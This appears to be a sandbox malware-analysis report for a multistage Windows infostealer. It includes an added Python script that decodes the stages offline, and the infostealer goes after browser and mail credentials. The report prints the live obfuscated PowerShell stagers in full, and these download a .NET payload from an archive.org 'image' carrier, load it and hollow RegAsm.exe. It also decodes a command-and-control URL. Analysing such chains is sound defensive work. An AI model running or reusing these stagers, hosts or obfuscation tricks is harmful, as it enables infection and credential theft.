iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jddqodhlicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagqurelxrzueugicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlrklusvrpt24gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ebgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagigfuwlpkeudmqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagrvpodljudyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagbvbfuejkukvvsix1aw50icagicagicagicagicagicagicagicagicagicagiezgesxjbnrqdhigicagicagicagicagicagicagicagicagicagicagyulnzmj3berwvik7jyagicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicagicaisuvhquljderniiagicagicagicagicagicagicagicagicagicagicatbkfnrvnqqwnficagicagicagicagicagicagicagicagicagicagifltuwqgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakn2o4ogu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xoduumjm1ljezny4ymjmvmjawl3bpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdhkudelgiiwijevudjpbufbeqvrbxhbpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdc52ylmildasmck7c3rbcnqtu0xfrvaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxwawn0dxjldxbkyxrlzhdpdghuzxdxdwfsaxqudmjtig=='+[char]34+'))')))"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jddqodhlicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagqurelxrzueugicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlrklusvrpt24gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ebgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagigfuwlpkeudmqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagrvpodljudyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagbvbfuejkukvvsix1aw50icagicagicagicagicagicagicagicagicagicagiezgesxjbnrqdhigicagicagicagicagicagicagicagicagicagicagyulnzmj3berwvik7jyagicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicagicaisuvhquljderniiagicagicagicagicagicagicagicagicagicagicatbkfnrvnqqwnficagicagicagicagicagicagicagicagicagicagifltuwqgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakn2o4ogu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xoduumjm1ljezny4ymjmvmjawl3bpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdhkudelgiiwijevudjpbufbeqvrbxhbpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdc52ylmildasmck7c3rbcnqtu0xfrvaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxwawn0dxjldxbkyxrlzhdpdghuzxdxdwfsaxqudmjtig=='+[char]34+'))')))"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?vqby? ? ? ? ?gw? ? ? ? ?i? ? ? ? ?? ? ? ? ?9? ? ? ? ?c? ? ? ? ?? ? ? ? ?jwbo? ? ? ? ?hq? ? ? ? ?d? ? ? ? ?bw? ? ? ? ?hm? ? ? ? ?og? ? ? ? ?v? ? ? ? ?c8? ? ? ? ?aqbh? ? ? ? ?dy? ? ? ? ?m? ? ? ? ?? ? ? ? ?x? ? ? ? ?dc? ? ? ? ?m? ? ? ? ?? ? ? ? ?2? ? ? ? ?c4? ? ? ? ?dqbz? ? ? ? ?c4? ? ? ? ?yqby? ? ? ? ?gm? ? ? ? ?a? ? ? ? ?bp? ? ? ? ?hy? ? ? ? ?zq? ? ? ? ?u? ? ? ? ?g8? ? ? ? ?cgbn? ? ? ? ?c8? ? ? ? ?mg? ? ? ? ?v? ? ? ? ?gk? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?cw? ? ? ? ?v? ? ? ? ?g4? ? ? ? ?zqb3? ? ? ? ?f8? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?f8? ? ? ? ?mg? ? ? ? ?w? ? ? ? ?di? ? ? ? ?n? ? ? ? ?? ? ? ? ?w? ? ? ? ?dk? ? ? ? ?m? ? ? ? ?? ? ? ? ?1? ? ? ? ?c8? ? ? ? ?bgbl? ? ? ? ?hc? ? ? ? ?xwbp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?lgbq? ? ? ? ?h? ? ? ? ?? ? ? ? ?zw? ? ? ? ?n? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?b3? ? ? ? ?gu? ? ? ? ?ygbd? ? ? ? ?gw? ? ? ? ?aqbl? ? ? ? ?g4? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?bo? ? ? ? ?gu? ? ? ? ?dw? ? ? ? ?t? ? ? ? ?e8? ? ? ? ?ygbq? ? ? ? ?gu? ? ? ? ?ywb0? ? ? ? ?c? ? ? ? ?? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbo? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?fc? ? ? ? ?zqbi? ? ? ? ?em? ? ? ? ?b? ? ? ? ?bp? ? ? ? ?gu? ? ? ? ?bgb0? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bp? ? ? ? ?g0? ? ? ? ?yqbn? ? ? ? ?gu? ? ? ? ?qgb5? ? ? ? ?hq? ? ? ? ?zqbz? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?cq? ? ? ? ?dwbl? ? ? ? ?gi? ? ? ? ?qwbs? ? ? ? ?gk? ? ? ? ?zqbu? ? ? ? ?hq? ? ? ? ?lgbe? ? ? ? ?g8? ? ? ? ?dwbu? ? ? ? ?gw? ? ? ? ?bwbh? ? ? ? ?gq? ? ? ? ?r? ? ? ? ?bh? ? ? ? ?hq? ? ? ? ?yq? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?fu? ? ? ? ?cgbs? ? ? ? ?ck? ? ? ? ?ow? ? ? ? ?k? ? ? ? ?gk? ? ? ? ?bqbh? ? ? ? ?gc? ? ? 
? ?zqbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c? ? ? ? ?? ? ? ? ?pq? ? ? ? ?g? ? ? ? ?fs? ? ? ? ?uwb5? ? ? ? ?hm? ? ? ? ?d? ? ? ? ?bl? ? ? ? ?g0? ? ? ? ?lgbu? ? ? ? ?gu? ? ? ? ?e? ? ? ? ?b0? ? ? ? ?c4? ? ? ? ?rqbu? ? ? ? ?gm? ? ? ? ?bwbk? ? ? ? ?gk? ? ? ? ?bgbn? ? ? ? ?f0? ? ? ? ?og? ? ? ? ?6? ? ? ? ?fu? ? ? ? ?v? ? ? ? ?bg? ? ? ? ?dg? ? ? ? ?lgbh? ? ? ? ?gu? ? ? ? ?d? ? ? ? ?bt? ? ? ? ?hq? ? ? ? ?cgbp? ? ? ? ?g4? ? ? ? ?zw? ? ? ? ?o? ? ? ? ?cq? ? ? ? ?aqbt? ? ? ? ?ge? ? ? ? ?zwbl? ? ? ? ?ei? ? ? ? ?eqb0? ? ? ? ?gu? ? ? ? ?cw? ? ? ? ?p? ? ? ? ?ds? ? ? ? ?j? ? ? ? ?bz? ? ? ? ?hq? ? ? ? ?yqby? ? ? ? ?hq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?dy? ? ? ? ?n? ? ? ? ?bf? ? ? ? ?fm? ? ? ? ?v? ? ? ? ?bb? ? ? ? ?fi? ? ? ? ?v? ? ? ? ?? ? ? ? ?+? ? ? ? ?d4? ? ? ? ?jw? ? ? ? ?7? ? ? ? ?cq? ? ? ? ?zqbu? ? ? ? ?gq? ? ? ? ?rgbs? ? ? ? ?ge? ? ? ? ?zw? ? ? ? ?g? ? ? ? ?d0? ? ? ? ?i? ? ? ? ?? ? ? ? ?n? ? ? ? ?dw? ? ? ? ?p? ? ? ? ?bc? ? ? ? ?ee? ? ? ? ?uwbf? ? ? ? ?d
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "$imageurl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webclient = new-object system.net.webclient;$imagebytes = $webclient.downloaddata($imageurl);$imagetext = [system.text.encoding]::utf8.getstring($imagebytes);$startflag = '<<base64_start>>';$endflag = '<<base64_end>>';$startindex = $imagetext.indexof($startflag);$endindex = $imagetext.indexof($endflag);$startindex -ge 0 -and $endindex -gt $startindex;$startindex += $startflag.length;$base64length = $endindex - $startindex;$base64command = $imagetext.substring($startindex, $base64length);$commandbytes = [system.convert]::frombase64string($base64command);$loadedassembly = [system.reflection.assembly]::load($commandbytes);$type = $loadedassembly.gettype('dnlib.io.home');$method = $type.getmethod('vai').invoke($null, [object[]] ('txt.recsrn/002/322.731.532.581//:ptth' , 'desativado' , 'desativado' , 'desativado','regasm',''))"
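The process-creation rows above are one chain. mshta.exe starts cmd.exe, which starts powershell.exe with a command assembled from quoted fragments and [char]N casts so that "::" and the double quote never appear literally; that stage drops and runs pictureupdatedwithnewqualit.vbS through wscript.exe; the script starts powershell.exe with the $Codigo blob; and the final -executionpolicy bypass stager downloads new_image.jpg, carves the text between <<BASE64_START>> and <<BASE64_END>>, hands the decoded bytes to Assembly.Load and calls dnlib.IO.Home.VAI with a reversed URL as first argument and "RegAsm" as the process to hollow. The Python below is an added example, not the report's or the malware's code: it redoes each of those transformations offline so the stages can be recovered from the command lines without executing them. The [char] expression, the marker strings and the VAI argument list are copied from the rows above; the base64 blob inside the stage-1 command and the JPEG carrier are constructed stand-ins, because the real blob is elided on this page and the real image is not part of the report.

```python
"""Offline reconstruction of the stager chain above (added example; not the report's or the malware's code)."""
import base64
import re

# --- Stage 1: cmd.exe -> powershell.exe. The real command is built from quoted fragments and
# [char]N casts so that "::" and the double quote never appear literally on the command line.
FRAGMENT_RE = re.compile(r"'((?:[^']|'')*)'|\[char\](0x[0-9a-f]+|\d+)", re.IGNORECASE)
INNER_RE = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', re.IGNORECASE)


def join_powershell_fragments(expr):
    """Evaluate an expression of the form 'a'+[char]58+[char]0x3A+'b' to the string PowerShell would build."""
    out = []
    for literal, code in FRAGMENT_RE.findall(expr):
        if code:
            out.append(chr(int(code, 16) if code.lower().startswith("0x") else int(code)))
        else:
            out.append(literal.replace("''", "'"))
    return "".join(out)


def decode_stage1(expr):
    """Join the fragments, then decode the base64 string handed to FromBase64String."""
    joined = join_powershell_fragments(expr)
    m = INNER_RE.search(joined)
    if not m:
        raise ValueError("no FromBase64String(\"...\") call after joining fragments")
    return joined, base64.b64decode(m.group(1)).decode("utf-8")


# --- Stage 2: the -executionpolicy bypass stager carves base64 out of a downloaded "image".
START, END = b"<<BASE64_START>>", b"<<BASE64_END>>"


def find_markers(blob, start=START, end=END):
    """(begin, end) offsets of the text between the markers, or None if the blob is not a carrier."""
    s = blob.find(start)
    if s < 0:
        return None
    e = blob.find(end, s + len(start))
    return None if e < 0 else (s + len(start), e)


def carve_payload(blob):
    """Decode the carried bytes and insist they are a PE image before anyone loads them.
    The stager runs the same search on the UTF-8 decoded download; searching raw bytes gives the
    same offsets for ASCII markers without choking on JPEG bytes. The original's
    `$startIndex -ge 0 -and $endIndex -gt $startIndex;` only computes a boolean and never acts on it."""
    span = find_markers(blob)
    if span is None:
        raise ValueError("markers not found: not a carrier for this stager")
    b64 = b"".join(blob[span[0]:span[1]].split())     # Convert.FromBase64String also ignores whitespace
    payload = base64.b64decode(b64, validate=True)
    e_lfanew = int.from_bytes(payload[0x3C:0x40], "little")
    if payload[:2] != b"MZ" or payload[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("decoded data is not a PE image")
    return payload


# --- Stage 3: the loaded assembly's dnlib.IO.Home.VAI receives its settings as plain strings,
# the first one being the next-stage URL written backwards.
def unreverse(arg):
    return arg[::-1]


# Constructed inputs. The [char] expression and the VAI argument list are the report's; the inner
# script and the carrier are stand-ins (the real blob is elided on this page, the real image is not shown).
INNER_SCRIPT = 'Start-Sleep 3; & wscript.exe "$env:APPDATA\\pictureupdatedwithnewqualit.vbS"'
STAGE1_EXPR = (
    "'[SySteM.TeXt.ENCodING]'+[cHAr]0x3A+[ChaR]58+'uTF8.GeTstRiNG([sysTeM.cONVerT]'"
    "+[cHAr]58+[Char]0X3a+'fROMBAsE64String('+[CHaR]34+'"
    + base64.b64encode(INNER_SCRIPT.encode()).decode()
    + "'+[chAr]34+'))'"
)
FAKE_PE = b"MZ" + b"\x90" * 58 + (0x80).to_bytes(4, "little") + b"\x00" * 64 + b"PE\x00\x00"   # e_lfanew -> 0x80
CARRIER = (b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x13\x37" * 32 +              # looks like a JPEG header
           START + b"\n" + base64.b64encode(FAKE_PE) + b"\n" + END + b"\xff\xd9")
VAI_ARGS = ("txt.RECSRN/002/322.731.532.581//:ptth", "desativado", "desativado", "desativado", "RegAsm", "")


def reconstruct_chain():
    """Run the three stages on the constructed inputs and return what an analyst wants from each."""
    joined, stage1_script = decode_stage1(STAGE1_EXPR)
    payload = carve_payload(CARRIER)
    return {
        "stage1_joined": joined,
        "stage1_script": stage1_script,
        "payload_len": len(payload),
        "next_stage_url": unreverse(VAI_ARGS[0]),
        "hollowing_host": VAI_ARGS[4],
    }


if __name__ == "__main__":
    for k, v in reconstruct_chain().items():
        print(f"{k}: {v}")
```

Reversing the first VAI argument from the row above yields http://185.235.137.223/200/NRSCER.txt, and the fifth argument names RegAsm.exe, which matches the Memory written rows earlier in this section where powershell.exe plants an MZ header in RegAsm.exe at 0x400000. The archive.org image is only a carrier; nothing in it is an image exploit, and the same carve works on any file the markers are appended to.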
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jddqodhlicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagqurelxrzueugicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlrklusvrpt24gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ebgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagigfuwlpkeudmqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagrvpodljudyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagbvbfuejkukvvsix1aw50icagicagicagicagicagicagicagicagicagicagiezgesxjbnrqdhigicagicagicagicagicagicagicagicagicagicagyulnzmj3berwvik7jyagicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicagicaisuvhquljderniiagicagicagicagicagicagicagicagicagicagicatbkfnrvnqqwnficagicagicagicagicagicagicagicagicagicagifltuwqgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakn2o4ogu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xoduumjm1ljezny4ymjmvmjawl3bpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdhkudelgiiwijevudjpbufbeqvrbxhbpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdc52ylmildasmck7c3rbcnqtu0xfrvaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxwawn0dxjldxbkyxrlzhdpdghuzxdxdwfsaxqudmjtig=='+[char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jddqodhlicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagqurelxrzueugicagicagicagicagicagicagicagicagicagicaglu1ftujlcmrlrklusvrpt24gicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoilvybg1vbi5ebgwilcagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagigfuwlpkeudmqsxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagrvpodljudyxzdhjpbmcgicagicagicagicagicagicagicagicagicagicagbvbfuejkukvvsix1aw50icagicagicagicagicagicagicagicagicagicagiezgesxjbnrqdhigicagicagicagicagicagicagicagicagicagicagyulnzmj3berwvik7jyagicagicagicagicagicagicagicagicagicagicattkftzsagicagicagicagicagicagicagicagicagicagicaisuvhquljderniiagicagicagicagicagicagicagicagicagicagicatbkfnrvnqqwnficagicagicagicagicagicagicagicagicagicagifltuwqgicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicakn2o4ogu6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xoduumjm1ljezny4ymjmvmjawl3bpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdhkudelgiiwijevudjpbufbeqvrbxhbpy3r1cmv1cgrhdgvkd2l0ag5ld3f1ywxpdc52ylmildasmck7c3rbcnqtu0xfrvaomyk7c1rbulqgicagicagicagicagicagicagicagicagicagicagiirftly6qvbqrefuqvxwawn0dxjldxbkyxrlzhdpdghuzxdxdwfsaxqudmjtig=='+[char]34+'))')))"Jump to behavior
                Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '[mis-encoded base64 payload omitted; unreadable in the extracted report]'
                Source: RegAsm.exe, 00000011.00000002.624344348.0000000000876000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00434CB6 cpuid 17_2_00434CB6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 17_2_0045201B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 17_2_004520B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 17_2_00452143
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW, 17_2_00452393
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 17_2_00448484
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 17_2_004524BC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW, 17_2_004525C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 17_2_00452690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoW, 17_2_0044896D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: GetLocaleInfoA, 17_2_0040F90C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: IsValidCodePage,GetLocaleInfoW, 17_2_00451D58
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: EnumSystemLocalesW, 17_2_00451FD0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_004489D7 GetSystemTimeAsFileTime, 17_2_004489D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_0041B69E GetComputerNameExW,GetUserNameW, 17_2_0041B69E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 17_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 17_2_00449210
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 21_2_0041739B GetVersionExW, 21_2_0041739B
                Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information

                Source: Yara match | File source: 14.2.powershell.exe.12691f90.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 17.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 14.2.powershell.exe.12691f90.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000011.00000002.624187857.00000000007F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000011.00000002.624187857.0000000000811000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.514320776.0000000012550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3940, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4064, type: MEMORYSTR
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data, 17_2_0040BA4D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\, 17_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: \key3.db, 17_2_0040BB6B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
